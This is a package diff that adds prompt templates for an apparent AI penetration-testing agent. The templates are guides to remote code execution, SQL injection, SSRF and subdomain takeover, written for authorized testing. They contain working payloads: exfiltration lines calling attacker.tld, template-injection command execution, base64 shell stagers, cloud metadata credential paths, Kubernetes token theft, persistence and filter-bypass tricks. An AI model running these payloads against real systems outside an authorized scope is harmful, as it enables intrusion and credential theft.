strix-agent 0.4.0__py3-none-any.whl

strix/prompts/vulnerabilities/rce.jinja

@@ -0,0 +1,154 @@
+<rce_vulnerability_guide>
+<title>REMOTE CODE EXECUTION (RCE)</title>
+
+<critical>RCE leads to full server control when input reaches code execution primitives: OS command wrappers, dynamic evaluators, template engines, deserializers, media pipelines, and build/runtime tooling. Focus on quiet, portable oracles and chain to stable shells only when needed.</critical>
+
+<scope>
+- OS command execution via wrappers (shells, system utilities, CLIs)
+- Dynamic evaluation: template engines, expression languages, eval/vm
+- Insecure deserialization and gadget chains across languages
+- Media/document toolchains (ImageMagick, Ghostscript, ExifTool, LaTeX, ffmpeg)
+- SSRF→internal services that expose execution primitives (FastCGI, Redis)
+- Container/Kubernetes escalation from app RCE to node/cluster compromise
+</scope>
+
+<methodology>
+1. Identify sinks: search for command wrappers, template rendering, deserialization, file converters, report generators, and plugin hooks.
+2. Establish a minimal oracle: timing, DNS/HTTP callbacks, or deterministic output diffs (length/ETag). Prefer OAST over noisy time sleeps.
+3. Confirm context: which user, working directory, PATH, shell, SELinux/AppArmor, containerization, read/write locations, outbound egress.
+4. Progress to durable control: file write, scheduled execution, service restart hooks; avoid loud reverse shells unless necessary.
+</methodology>
+
+<detection_channels>
+<time_based>
+- Unix: ;sleep 1 | `sleep 1` || sleep 1; gate delays with short subcommands to reduce noise
+- Windows CMD/PowerShell: & timeout /t 2 & | Start-Sleep -s 2 | ping -n 2 127.0.0.1
+</time_based>
+
+<oast>
+- DNS: {% raw %}nslookup $(whoami).x.attacker.tld{% endraw %} or {% raw %}curl http://$(id -u).x.attacker.tld{% endraw %}
+- HTTP beacon: {% raw %}curl https://attacker.tld/$(hostname){% endraw %} (or fetch to pre-signed URL)
+</oast>
+
+<output_based>
+- Direct: ;id;uname -a;whoami
+- Encoded: ;(id;hostname)|base64; hex via xxd -p
+</output_based>
+</detection_channels>
+
+<command_injection>
+<delimiters_and_operators>
+- ; | || & && `cmd` $(cmd) $() ${IFS} newline/tab; Windows: & | || ^
+</delimiters_and_operators>
+
+<argument_injection>
+- Inject flags/filenames into CLI arguments (e.g., --output=/tmp/x; --config=); break out of quoted segments by alternating quotes and escapes
+- Environment expansion: $PATH, ${HOME}, command substitution; Windows %TEMP%, !VAR!, PowerShell $(...)
+</argument_injection>
+
+<path_and_builtin_confusion>
+- Force absolute paths (/usr/bin/id) vs relying on PATH; prefer builtins or alternative tools (printf, getent) when id is filtered
+- Use sh -c or cmd /c wrappers to reach the shell even if binaries are filtered
+</path_and_builtin_confusion>
+
+<evasion>
+- Whitespace/IFS: ${IFS}, $'\t', <; case/Unicode variations; mixed encodings; backslash line continuations
+- Token splitting: w'h'o'a'm'i, w"h"o"a"m"i; build via variables: a=i;b=d; $a$b
+- Base64/hex stagers: echo payload | base64 -d | sh; PowerShell: IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String(...)))
+</evasion>
+</command_injection>
+
+<template_injection>
+- Identify server-side template engines: Jinja2/Twig/Blade/Freemarker/Velocity/Thymeleaf/EJS/Handlebars/Pug
+- Move from expression to code execution primitives (read file, run command)
+- Minimal probes:
+{% raw %}
+Jinja2: {{7*7}} → {{cycler.__init__.__globals__['os'].popen('id').read()}}
+Twig: {{7*7}} → {{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
+Freemarker: ${7*7} → <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id") }
+EJS: <%= global.process.mainModule.require('child_process').execSync('id') %>
+{% endraw %}
+</template_injection>
+
+<deserialization_and_el>
+- Java: gadget chains via CommonsCollections/BeanUtils/Spring; tools: ysoserial; JNDI/LDAP chains (Log4Shell-style) when lookups are reachable
+- .NET: BinaryFormatter/DataContractSerializer/APIs that accept untrusted ViewState without MAC
+- PHP: unserialize() and PHAR metadata; autoloaded gadget chains in frameworks and plugins
+- Python/Ruby: pickle, yaml.load/unsafe_load, Marshal; seek auto-deserialization in message queues/caches
+- Expression languages: OGNL/SpEL/MVEL/EL; reach Runtime/ProcessBuilder/exec
+</deserialization_and_el>
+
+<media_and_document_pipelines>
+- ImageMagick/GraphicsMagick: policy.xml may limit delegates; still test legacy vectors and complex file formats
+{% raw %}
+Example: push graphic-context\nfill 'url(https://x.tld/a"|id>/tmp/o")'\npop graphic-context
+{% endraw %}
+- Ghostscript: PostScript in PDFs/PS; {% raw %}%pipe%id{% endraw %} file operators
+- ExifTool: crafted metadata invoking external tools or library bugs (historical CVEs)
+- LaTeX: \write18/--shell-escape, \input piping; pandoc filters
+- ffmpeg: concat/protocol tricks mediated by compile-time flags
+</media_and_document_pipelines>
+
+<ssrf_to_rce>
+- FastCGI: gopher:// to php-fpm (build FPM records to invoke system/exec via vulnerable scripts)
+- Redis: gopher:// write cron/authorized_keys or webroot if filesystem exposed; or module load when allowed
+- Admin interfaces: Jenkins script console, Spark UI, Jupyter kernels reachable internally
+</ssrf_to_rce>
+
+<container_and_kubernetes>
+<docker>
+- From app RCE, inspect /.dockerenv, /proc/1/cgroup; enumerate mounts and capabilities (capsh --print)
+- Abuses: mounted docker.sock, hostPath mounts, privileged containers; write to /proc/sys/kernel/core_pattern or mount host with --privileged
+</docker>
+
+<kubernetes>
+- Steal service account token from /var/run/secrets/kubernetes.io/serviceaccount; query API for pods/secrets; enumerate RBAC
+- Talk to kubelet on 10250/10255; exec into pods; list/attach if anonymous/weak auth
+- Escalate via privileged pods, hostPath mounts, or daemonsets if permissions allow
+</kubernetes>
+</container_and_kubernetes>
+
+<post_exploitation>
+- Privilege escalation: sudo -l; SUID binaries; capabilities (getcap -r / 2>/dev/null)
+- Persistence: cron/systemd/user services; web shell behind auth; plugin hooks; supply chain in CI/CD
+- Lateral movement: pivot with SSH keys, cloud metadata credentials, internal service tokens
+</post_exploitation>
+
+<waf_and_filter_bypasses>
+- Encoding differentials (URL, Unicode normalization), comment insertion, mixed case, request smuggling to reach alternate parsers
+- Absolute paths and alternate binaries (busybox, sh, env); Windows variations (PowerShell vs CMD), constrained language bypasses
+</waf_and_filter_bypasses>
+
+<validation>
+1. Provide a minimal, reliable oracle (DNS/HTTP/timing) proving code execution.
+2. Show command context (uid, gid, cwd, env) and controlled output.
+3. Demonstrate persistence or file write under application constraints.
+4. If containerized, prove boundary crossing attempts (host files, kube APIs) and whether they succeed.
+5. Keep PoCs minimal and reproducible across runs and transports.
+</validation>
+
+<false_positives>
+- Only crashes or timeouts without controlled behavior
+- Filtered execution of a limited command subset with no attacker-controlled args
+- Sandboxed interpreters executing in a restricted VM with no IO or process spawn
+- Simulated outputs not derived from executed commands
+</false_positives>
+
+<impact>
+- Remote system control under application user; potential privilege escalation to root
+- Data theft, encryption/signing key compromise, supply-chain insertion, lateral movement
+- Cluster compromise when combined with container/Kubernetes misconfigurations
+</impact>
+
+<pro_tips>
+1. Prefer OAST oracles; avoid long sleeps—short gated delays reduce noise.
+2. When command injection is weak, pivot to file write or deserialization/SSTI paths for stable control.
+3. Treat converters/renderers as first-class sinks; many run out-of-process with powerful delegates.
+4. For Java/.NET, enumerate classpaths/assemblies and known gadgets; verify with out-of-band payloads.
+5. Confirm environment: PATH, shell, umask, SELinux/AppArmor, container caps; it informs payload choice.
+6. Keep payloads portable (POSIX/BusyBox/PowerShell) and minimize dependencies.
+7. Document the smallest exploit chain that proves durable impact; avoid unnecessary shell drops.
+</pro_tips>
+
+<remember>RCE is a property of the execution boundary. Find the sink, establish a quiet oracle, and escalate to durable control only as far as necessary. Validate across transports and environments; defenses often differ per code path.</remember>
+</rce_vulnerability_guide>

strix/prompts/vulnerabilities/sql_injection.jinja

@@ -0,0 +1,151 @@
+<sql_injection_guide>
+<title>SQL INJECTION</title>
+
+<critical>SQLi remains one of the most durable and impactful classes. Modern exploitation focuses on parser differentials, ORM/query-builder edges, JSON/XML/CTE/JSONB surfaces, out-of-band exfiltration, and subtle blind channels. Treat every string concatenation into SQL as suspect.</critical>
+
+<scope>
+- Classic relational DBMS: MySQL/MariaDB, PostgreSQL, MSSQL, Oracle
+- Newer surfaces: JSON/JSONB operators, full-text/search, geospatial, window functions, CTEs, lateral joins
+- Integration paths: ORMs, query builders, stored procedures, search servers, reporting/exporters
+</scope>
+
+<methodology>
+1. Identify query shape: SELECT/INSERT/UPDATE/DELETE, presence of WHERE/ORDER/GROUP/LIMIT/OFFSET, and whether user input influences identifiers vs values.
+2. Confirm injection class: reflective errors, boolean diffs, timing, or out-of-band callbacks. Choose the quietest reliable oracle.
+3. Establish a minimal extraction channel: UNION (if visible), error-based, boolean bit extraction, time-based, or OAST/DNS.
+4. Pivot to metadata and high-value tables, then target impactful write primitives (auth bypass, role changes, filesystem access) if feasible.
+</methodology>
+
+<injection_surfaces>
+- Path/query/body/header/cookie; mixed encodings (URL, JSON, XML, multipart)
+- Identifier vs value: table/column names (require quoting/escaping) vs literals (quotes/CAST requirements)
+- Query builders: whereRaw/orderByRaw, string templates in ORMs; JSON coercion or array containment operators
+- Batch/bulk endpoints and report generators that embed filters directly
+</injection_surfaces>
+
+<detection_channels>
+- Error-based: provoke type/constraint/parser errors revealing stack/version/paths
+- Boolean-based: pair requests differing only in predicate truth; diff status/body/length/ETag
+- Time-based: SLEEP/pg_sleep/WAITFOR; use subselect gating to avoid global latency noise
+- Out-of-band (OAST): DNS/HTTP callbacks via DB-specific primitives
+</detection_channels>
+
+<union_visibility>
+- Determine column count and types via ORDER BY n and UNION SELECT null,...
+- Align types with CAST/CONVERT; coerce to text/json for rendering
+- When UNION is filtered, consider error-based or blind channels
+</union_visibility>
+
+<dbms_primitives>
+<mysql>
+- Version/user/db: @@version, database(), user(), current_user()
+- Error-based: extractvalue()/updatexml() (older), JSON functions for error shaping
+- File IO: LOAD_FILE(), SELECT ... INTO DUMPFILE/OUTFILE (requires FILE privilege, secure_file_priv)
+- OOB/DNS: LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))
+- Time: SLEEP(n), BENCHMARK
+- JSON: JSON_EXTRACT/JSON_SEARCH with crafted paths; GIS funcs sometimes leak
+</mysql>
+
+<postgresql>
+- Version/user/db: version(), current_user, current_database()
+- Error-based: raise exception via unsupported casts or division by zero; xpath() errors in xml2
+- OOB: COPY (program ...) or dblink/foreign data wrappers (when enabled); http extensions
+- Time: pg_sleep(n)
+- Files: COPY table TO/FROM '/path' (requires superuser), lo_import/lo_export
+- JSON/JSONB: operators ->, ->>, @>, ?| with lateral/CTE for blind extraction
+</postgresql>
+
+<mssql>
+- Version/db/user: @@version, db_name(), system_user, user_name()
+- OOB/DNS: xp_dirtree, xp_fileexist; HTTP via OLE automation (sp_OACreate) if enabled
+- Exec: xp_cmdshell (often disabled), OPENROWSET/OPENDATASOURCE
+- Time: WAITFOR DELAY '0:0:5'; heavy functions cause measurable delays
+- Error-based: convert/parse, divide by zero, FOR XML PATH leaks
+</mssql>
+
+<oracle>
+- Version/db/user: banner from v$version, ora_database_name, user
+- OOB: UTL_HTTP/DBMS_LDAP/UTL_INADDR/HTTPURITYPE (permissions dependent)
+- Time: dbms_lock.sleep(n)
+- Error-based: to_number/to_date conversions, XMLType
+- File: UTL_FILE with directory objects (privileged)
+</oracle>
+</dbms_primitives>
+
+<blind_extraction>
+- Branch on single-bit predicates using SUBSTRING/ASCII, LEFT/RIGHT, or JSON/array operators
+- Binary search on character space for fewer requests; encode outputs (hex/base64) to normalize
+- Gate delays inside subqueries to reduce noise: AND (SELECT CASE WHEN (predicate) THEN pg_sleep(0.5) ELSE 0 END)
+</blind_extraction>
+
+<out_of_band>
+- Prefer OAST to minimize noise and bypass strict response paths; embed data in DNS labels or HTTP query params
+- MSSQL: xp_dirtree \\\\<data>.attacker.tld\\a; Oracle: UTL_HTTP.REQUEST('http://<data>.attacker'); MySQL: LOAD_FILE with UNC
+</out_of_band>
+
+<write_primitives>
+- Auth bypass: inject OR-based tautologies or subselects into login checks
+- Privilege changes: update role/plan/feature flags when UPDATE is injectable
+- File write: INTO OUTFILE/DUMPFILE, COPY TO, xp_cmdshell redirection; aim for webroot only when feasible and legal
+- Job/proc abuse: schedule tasks or create procedures/functions when permissions allow
+</write_primitives>
+
+<waf_and_parser_bypasses>
+- Whitespace/spacing: /**/, /**/!00000, comments, newlines, tabs, 0xe3 0x80 0x80 (ideographic space)
+- Keyword splitting/concatenation: UN/**/ION, U%4eION, backticks/quotes, case folding
+- Numeric tricks: scientific notation, signed/unsigned, hex (0x61646d696e)
+- Encodings: double URL encoding, mixed Unicode normalizations (NFKC/NFD), char()/CONCAT_ws to build tokens
+- Clause relocation: subselects, derived tables, CTEs (WITH), lateral joins to hide payload shape
+</waf_and_parser_bypasses>
+
+<orm_and_query_builders>
+- Dangerous APIs: whereRaw/orderByRaw, string interpolation into LIKE/IN/ORDER clauses
+- Injections via identifier quoting (table/column names) when user input is interpolated into identifiers
+- JSON containment operators exposed by ORMs (e.g., @> in PostgreSQL) with raw fragments
+- Parameter mismatch: partial parameterization where operators or lists remain unbound (IN (...))
+</orm_and_query_builders>
+
+<uncommon_contexts>
+- ORDER BY/GROUP BY/HAVING with CASE WHEN for boolean channels
+- LIMIT/OFFSET: inject into OFFSET to produce measurable timing or page shape
+- Full-text/search helpers: MATCH AGAINST, to_tsvector/to_tsquery with payload mixing
+- XML/JSON functions: error generation via malformed documents/paths
+</uncommon_contexts>
+
+<validation>
+1. Show a reliable oracle (error/boolean/time/OAST) and prove control by toggling predicates.
+2. Extract verifiable metadata (version, current user, database name) using the established channel.
+3. Retrieve or modify a non-trivial target (table rows, role flag) within legal scope.
+4. Provide reproducible requests that differ only in the injected fragment.
+5. Where applicable, demonstrate defense-in-depth bypass (WAF on, still exploitable via variant).
+</validation>
+
+<false_positives>
+- Generic errors unrelated to SQL parsing or constraints
+- Static response sizes due to templating rather than predicate truth
+- Artificial delays from network/CPU unrelated to injected function calls
+- Parameterized queries with no string concatenation, verified by code review
+</false_positives>
+
+<impact>
+- Direct data exfiltration and privacy/regulatory exposure
+- Authentication and authorization bypass via manipulated predicates
+- Server-side file access or command execution (platform/privilege dependent)
+- Persistent supply-chain impact via modified data, jobs, or procedures
+</impact>
+
+<pro_tips>
+1. Pick the quietest reliable oracle first; avoid noisy long sleeps.
+2. Normalize responses (length/ETag/digest) to reduce variance when diffing.
+3. Aim for metadata then jump directly to business-critical tables; minimize lateral noise.
+4. When UNION fails, switch to error- or blind-based bit extraction; prefer OAST when available.
+5. Treat ORMs as thin wrappers: raw fragments often slip through; audit whereRaw/orderByRaw.
+6. Use CTEs/derived tables to smuggle expressions when filters block SELECT directly.
+7. Exploit JSON/JSONB operators in Postgres and JSON functions in MySQL for side channels.
+8. Keep payloads portable; maintain DBMS-specific dictionaries for functions and types.
+9. Validate mitigations with negative tests and code review; parameterize operators/lists correctly.
+10. Document exact query shapes; defenses must match how the query is constructed, not assumptions.
+</pro_tips>
+
+<remember>Modern SQLi succeeds where authorization and query construction drift from assumptions. Bind parameters everywhere, avoid dynamic identifiers, and validate at the exact boundary where user input meets SQL.</remember>
+</sql_injection_guide>

strix/prompts/vulnerabilities/ssrf.jinja

@@ -0,0 +1,135 @@
+<ssrf_vulnerability_guide>
+<title>SERVER-SIDE REQUEST FORGERY (SSRF)</title>
+
+<critical>SSRF enables the server to reach networks and services the attacker cannot. Focus on cloud metadata endpoints, service meshes, Kubernetes, and protocol abuse to turn a single fetch into credentials, lateral movement, and sometimes RCE.</critical>
+
+<scope>
+- Outbound HTTP/HTTPS fetchers (proxies, previewers, importers, webhook testers)
+- Non-HTTP protocols via URL handlers (gopher, dict, file, ftp, smb wrappers)
+- Service-to-service hops through gateways and sidecars (envoy/nginx)
+- Cloud and platform metadata endpoints, instance services, and control planes
+</scope>
+
+<methodology>
+1. Identify every user-influenced URL/host/path across web/mobile/API and background jobs. Include headers that trigger server-side fetches (link previews, analytics, crawler hooks).
+2. Establish a quiet oracle first (OAST DNS/HTTP callbacks). Then pivot to internal addressing (loopback, RFC1918, link-local, IPv6, hostnames) and protocol variations.
+3. Enumerate redirect behavior, header propagation, and method control (GET-only vs arbitrary). Test parser differentials across frameworks, CDNs, and language libraries.
+4. Target high-value services (metadata, kubelet, Redis, FastCGI, Docker, Vault, internal admin panels). Chain to write/exec primitives if possible.
+</methodology>
+
+<injection_surfaces>
+- Direct URL params: url=, link=, fetch=, src=, webhook=, avatar=, image=
+- Indirect sources: Open Graph/link previews, PDF/image renderers, server-side analytics (Referer trackers), import/export jobs, webhooks/callback verifiers
+- Protocol-translating services: PDF via wkhtmltopdf/Chrome headless, image pipelines, document parsers, SSO validators, archive expanders
+- Less obvious: GraphQL resolvers that fetch by URL, background crawlers, repository/package managers (git, npm, pip), calendar (ICS) fetchers
+</injection_surfaces>
+
+<cloud_and_platforms>
+<aws>
+- IMDSv1: http://169.254.169.254/latest/meta-data/ → {% raw %}/iam/security-credentials/{role}{% endraw %}, {% raw %}/user-data{% endraw %}
+- IMDSv2: requires token via PUT {% raw %}/latest/api/token{% endraw %} with header {% raw %}X-aws-ec2-metadata-token-ttl-seconds{% endraw %}, then include {% raw %}X-aws-ec2-metadata-token{% endraw %} on subsequent GETs. If the sink cannot set headers or methods, fallback to other targets or seek intermediaries that can
+- ECS/EKS task credentials: {% raw %}http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI{% endraw %}
+</aws>
+
+<gcp>
+- Endpoint: http://metadata.google.internal/computeMetadata/v1/
+- Required header: {% raw %}Metadata-Flavor: Google{% endraw %}
+- Target: {% raw %}/instance/service-accounts/default/token{% endraw %}
+</gcp>
+
+<azure>
+- Endpoint: http://169.254.169.254/metadata/instance?api-version=2021-02-01
+- Required header: {% raw %}Metadata: true{% endraw %}
+- MSI OAuth: {% raw %}/metadata/identity/oauth2/token{% endraw %}
+</azure>
+
+<kubernetes>
+- Kubelet: 10250 (authenticated) and 10255 (deprecated read-only). Probe {% raw %}/pods{% endraw %}, {% raw %}/metrics{% endraw %}, exec/attach endpoints
+- API server: https://kubernetes.default.svc/. Authorization often needs the service account token; SSRF that propagates headers/cookies may reuse them
+- Service discovery: attempt cluster DNS names (svc.cluster.local) and default services (kube-dns, metrics-server)
+</kubernetes>
+</cloud_and_platforms>
+
+<internal_targets>
+- Docker API: http://localhost:2375/v1.24/containers/json (no TLS variants often internal-only)
+- Redis/Memcached: dict://localhost:11211/stat, gopher payloads to Redis on 6379
+- Elasticsearch/OpenSearch: http://localhost:9200/_cat/indices
+- Message brokers/admin UIs: RabbitMQ, Kafka REST, Celery/Flower, Jenkins crumb APIs
+- FastCGI/PHP-FPM: gopher://localhost:9000/ (craft records for file write/exec when app routes to FPM)
+</internal_targets>
+
+<protocol_exploitation>
+<gopher>
+- Speak raw text protocols (Redis/SMTP/IMAP/HTTP/FCGI). Use to craft multi-line payloads, schedule cron via Redis, or build FastCGI requests
+</gopher>
+
+<file_and_wrappers>
+- file:///etc/passwd, file:///proc/self/environ when libraries allow file handlers
+- jar:, netdoc:, smb:// and language-specific wrappers (php://, expect://) where enabled
+</file_and_wrappers>
+
+<parser_and_filter_bypasses>
+<address_variants>
+- Loopback: 127.0.0.1, 127.1, 2130706433, 0x7f000001, ::1, [::ffff:127.0.0.1]
+- RFC1918/link-local: 10/8, 172.16/12, 192.168/16, 169.254/16; test IPv6-mapped and mixed-notation forms
+</address_variants>
+
+<url_confusion>
+- Userinfo and fragments: http://internal@attacker/ or http://attacker#@internal/
+- Scheme-less/relative forms the server might complete internally: //169.254.169.254/
+- Trailing dots and mixed case: internal. vs INTERNAL, Unicode dot lookalikes
+</url_confusion>
+
+<redirect_behavior>
+- Allowlist only applied pre-redirect: 302 from attacker → internal host. Test multi-hop and protocol switches (http→file/gopher via custom clients)
+</redirect_behavior>
+
+<header_and_method_control>
+- Some sinks reflect or allow CRLF-injection into the request line/headers; if arbitrary headers/methods are possible, IMDSv2, GCP, and Azure become reachable
+</header_and_method_control>
+
+<blind_and_mapping>
+- Use OAST (DNS/HTTP) to confirm egress. Derive internal reachability from timing, response size, TLS errors, and ETag differences
+- Build a port map by binary searching timeouts (short connect/read timeouts yield cleaner diffs)
+</blind_and_mapping>
+
+<chaining>
+- SSRF → Metadata creds → cloud API access (list buckets, read secrets)
+- SSRF → Redis/FCGI/Docker → file write/command execution → shell
+- SSRF → Kubelet/API → pod list/logs → token/secret discovery → lateral
+</chaining>
+
+<validation>
+1. Prove an outbound server-initiated request occurred (OAST interaction or internal-only response differences).
+2. Show access to non-public resources (metadata, internal admin, service ports) from the vulnerable service.
+3. Where possible, demonstrate minimal-impact credential access (short-lived token) or a harmless internal data read.
+4. Confirm reproducibility and document request parameters that control scheme/host/headers/method and redirect behavior.
+</validation>
+
+<false_positives>
+- Client-side fetches only (no server request)
+- Strict allowlists with DNS pinning and no redirect following
+- SSRF simulators/mocks returning canned responses without real egress
+- Blocked egress confirmed by uniform errors across all targets and protocols
+</false_positives>
+
+<impact>
+- Cloud credential disclosure with subsequent control-plane/API access
+- Access to internal control panels and data stores not exposed publicly
+- Lateral movement into Kubernetes, service meshes, and CI/CD
+- RCE via protocol abuse (FCGI, Redis), Docker daemon access, or scriptable admin interfaces
+</impact>
+
+<pro_tips>
+1. Prefer OAST callbacks first; then iterate on internal addressing and protocols.
+2. Test IPv6 and mixed-notation addresses; filters often ignore them.
+3. Observe library/client differences (curl, Java HttpClient, Node, Go); behavior changes across services and jobs.
+4. Redirects are leverage: control both the initial allowlisted host and the next hop.
+5. Metadata endpoints require headers/methods; verify if your sink can set them or if intermediaries add them for you.
+6. Use tiny payloads and tight timeouts to map ports with minimal noise.
+7. When responses are masked, diff length/ETag/status and TLS error classes to infer reachability.
+8. Chain quickly to durable impact (short-lived tokens, harmless internal reads) and stop there.
+</pro_tips>
+
+<remember>Any feature that fetches remote content on behalf of a user is a potential tunnel to internal networks and control planes. Bind scheme/host/port/headers explicitly or expect an attacker to route through them.</remember>
+</ssrf_vulnerability_guide>

strix/prompts/vulnerabilities/subdomain_takeover.jinja

@@ -0,0 +1,155 @@
+<subdomain_takeover_guide>
+<title>SUBDOMAIN TAKEOVER</title>
+
+<critical>Subdomain takeover lets an attacker serve content from a trusted subdomain by claiming resources referenced by dangling DNS (CNAME/A/ALIAS/NS) or mis-bound provider configurations. Consequences include phishing on a trusted origin, cookie and CORS pivot, OAuth redirect abuse, and CDN cache poisoning.</critical>
+
+<scope>
+- Dangling CNAME/A/ALIAS to third-party services (hosting, storage, serverless, CDN)
+- Orphaned NS delegations (child zones with abandoned/expired nameservers)
+- Decommissioned SaaS integrations (support, docs, marketing, forms) referenced via CNAME
+- CDN “alternate domain” mappings (CloudFront/Fastly/Azure CDN) lacking ownership verification
+- Storage and static hosting endpoints (S3/Blob/GCS buckets, GitHub/GitLab Pages)
+</scope>
+
+<methodology>
+1. Enumerate subdomains comprehensively (web, API, mobile, legacy): aggregate CT logs, passive DNS, and org inventory. De-duplicate and normalize.
+2. Resolve DNS for all RR types: A/AAAA, CNAME, NS, MX, TXT. Keep CNAME chains; record terminal CNAME targets and provider hints.
+3. HTTP/TLS probe: capture status, body, length, canonical error text, Server/alt-svc headers, certificate SANs, and CDN headers (Via, X-Served-By).
+4. Fingerprint providers: map known “unclaimed/missing resource” signatures to candidate services. Maintain a living dictionary.
+5. Attempt claim (only with authorization): create the missing resource on the provider with the exact required name; bind the custom domain if the provider allows.
+6. Validate control: serve a minimal unique payload; confirm over HTTPS; optionally obtain a DV certificate (CT log evidence) within legal scope.
+</methodology>
+
+<discovery_techniques>
+<enumeration_pipeline>
+- Subdomain inventory: combine CT (crt.sh APIs), passive DNS sources, in-house asset lists, IaC/terraform outputs, mobile app assets, and historical DNS
+- Resolver sweep: use IPv4/IPv6-aware resolvers; track NXDOMAIN vs SERVFAIL vs provider-branded 4xx/5xx responses
+- Record graph: build a CNAME graph and collapse chains to identify external endpoints (e.g., myapp.example.com → foo.azurewebsites.net)
+</enumeration_pipeline>
+
+<dns_indicators>
+- CNAME targets ending in provider domains: github.io, amazonaws.com, cloudfront.net, azurewebsites.net, blob.core.windows.net, fastly.net, vercel.app, netlify.app, herokudns.com, trafficmanager.net, azureedge.net, akamaized.net
+- Orphaned NS: subzone delegated to nameservers on a domain that has expired or no longer hosts authoritative servers; or to inexistent NS hosts
+- MX to third-party mail providers with decommissioned domains (risk: mail subdomain control or delivery manipulation)
+- TXT/verification artifacts (asuid, _dnsauth, _github-pages-challenge) suggesting previous external bindings
+</dns_indicators>
+
+<http_fingerprints>
+- Service-specific unclaimed messages (examples, not exhaustive):
+  - GitHub Pages: “There isn’t a GitHub Pages site here.”
+  - Fastly: “Fastly error: unknown domain”
+  - Heroku: “No such app” or “There’s nothing here, yet.”
+  - S3 static site: “NoSuchBucket” / “The specified bucket does not exist”
+  - CloudFront (alt domain not configured): 403/400 with “The request could not be satisfied” and no matching distribution
+  - Azure App Service: default 404 for azurewebsites.net unless custom-domain verified (look for asuid TXT requirement)
+  - Shopify: “Sorry, this shop is currently unavailable”
+- TLS clues: certificate CN/SAN referencing provider default host instead of the custom subdomain indicates potential mis-binding
+</http_fingerprints>
+</discovery_techniques>
+
+<exploitation_techniques>
+<claim_third_party_resource>
+- Create the resource with the exact required name:
+  - Storage/hosting: S3 bucket “sub.example.com” (website endpoint) or bucket named after the CNAME target if provider dictates
+  - Pages hosting: create repo/site and add the custom domain (when provider does not enforce prior domain verification)
+  - Serverless/app hosting: create app/site matching the target hostname, then add custom domain mapping
+- Bind the custom domain: some providers require TXT verification (modern hardened path), others historically allowed binding without proof
+</claim_third_party_resource>
+
+<cdn_alternate_domains>
+- Add the victim subdomain as an alternate domain on your CDN distribution if the provider does not enforce domain ownership checks
+- Upload a TLS cert via provider or use managed cert issuance if allowed; confirm 200 on the subdomain with your content
+</cdn_alternate_domains>
+
+<ns_delegation_takeover>
+- If a child zone (e.g., zone.example.com) is delegated to nameservers under an expired domain (ns1.abandoned.tld), register abandoned.tld and host authoritative NS; publish records to control all hosts under the delegated subzone
+- Validate with SOA/NS queries and serve a verification token; then add A/CNAME/MX/TXT as needed
+</ns_delegation_takeover>
+
+<mail_surface>
+- If MX points to a decommissioned provider that allowed inbox creation without domain re-verification (historically), a takeover could enable email receipt for that subdomain; modern providers generally require explicit TXT ownership
+</mail_surface>
+</exploitation_techniques>
+
+<advanced_techniques>
+<blind_and_cache_channels>
+- CDN edge behavior: 404/421 vs 403 differentials reveal whether an alt name is partially configured; probe with Host header manipulation
+- Cache poisoning: once taken over, exploit cache keys and Vary headers to persist malicious responses at the edge
+</blind_and_cache_channels>
+
+<ct_and_tls>
+- Use CT logs to detect unexpected certificate issuance for your subdomain; for PoC, issue a DV cert post-takeover (within scope) to produce verifiable evidence
+</ct_and_tls>
+
+<oauth_and_trust_chains>
+- If the subdomain is whitelisted as an OAuth redirect/callback or in CSP/script-src, a takeover elevates impact to account takeover or script injection on trusted origins
+</oauth_and_trust_chains>
+
+<provider_edges>
+- Many providers hardened domain binding (TXT verification) but legacy projects or specific products remain weak; verify per-product behavior (CDN vs app hosting vs storage)
+- Multi-tenant providers sometimes accept custom domains at the edge even when backend resource is missing; leverage timing and registration windows
+</provider_edges>
+</advanced_techniques>
+
+<bypass_techniques>
+<verification_gaps>
+- Look for providers that accept domain binding prior to TXT verification, or where verification is optional for trial/legacy tiers
+- Race windows: re-claim resource names immediately after victim deletion while DNS still points to provider
+</verification_gaps>
+
+<wildcards_and_fallbacks>
+- Wildcard CNAMEs to providers may expose unbounded subdomains; test random hosts to identify service-wide unclaimed behavior
+- Fallback origins: CDNs configured with multiple origins may expose unknown-domain responses from a default origin that is claimable
+</wildcards_and_fallbacks>
+</bypass_techniques>
+
+<special_contexts>
+<storage_and_static>
+- S3/GCS/Azure Blob static sites: bucket naming constraints dictate whether a bucket can match hostname; website vs API endpoints differ in claimability and fingerprints
+</storage_and_static>
+
+<serverless_and_hosting>
+- GitHub/GitLab Pages, Netlify, Vercel, Azure Static Web Apps: domain binding flows vary; most require TXT now, but historical projects or specific paths may not
+</serverless_and_hosting>
+
+<cdn_and_edge>
+- CloudFront/Fastly/Azure CDN/Akamai: alternate domain verification differs; some products historically allowed alt-domain claims without proof
+</cdn_and_edge>
+
+<dns_delegations>
+- Child-zone NS delegations outrank parent records; control of delegated NS yields full control of all hosts below that label
+</dns_delegations>
+</special_contexts>
+
+<validation>
+1. Before: record DNS chain, HTTP response (status/body length/fingerprint), and TLS details.
+2. After claim: serve unique content and verify over HTTPS at the target subdomain.
+3. Optional: issue a DV certificate (legal scope) and reference CT entry as durable evidence.
+4. Demonstrate impact chains (CSP/script-src trust, OAuth redirect acceptance, cookie Domain scoping) with minimal PoCs.
+</validation>
+
+<false_positives>
+- “Unknown domain” pages that are not claimable due to enforced TXT/ownership checks.
+- Provider-branded default pages for valid, owned resources (not a takeover) versus “unclaimed resource” states
+- Soft 404s from your own infrastructure or catch-all vhosts
+</false_positives>
+
+<impact>
+- Content injection under trusted subdomain: phishing, malware delivery, brand damage
+- Cookie and CORS pivot: if parent site sets Domain-scoped cookies or allows subdomain origins in CORS/Trusted Types/CSP
+- OAuth/SSO abuse via whitelisted redirect URIs
+- Email delivery manipulation for subdomain (MX/DMARC/SPF interactions in edge cases)
+</impact>
+
+<pro_tips>
+1. Build a pipeline: enumerate (subfinder/amass) → resolve (dnsx) → probe (httpx) → fingerprint (nuclei/custom) → verify claims.
+2. Maintain a current fingerprint corpus; provider messages change frequently—prefer regex families over exact strings.
+3. Prefer minimal PoCs: static “ownership proof” page and, where allowed, DV cert issuance for auditability.
+4. Monitor CT for unexpected certs on your subdomains; alert and investigate.
+5. Eliminate dangling DNS in decommission workflows first; deletion of the app/service must remove or block the DNS target.
+6. For NS delegations, treat any expired nameserver domain as critical; reassign or remove delegation immediately.
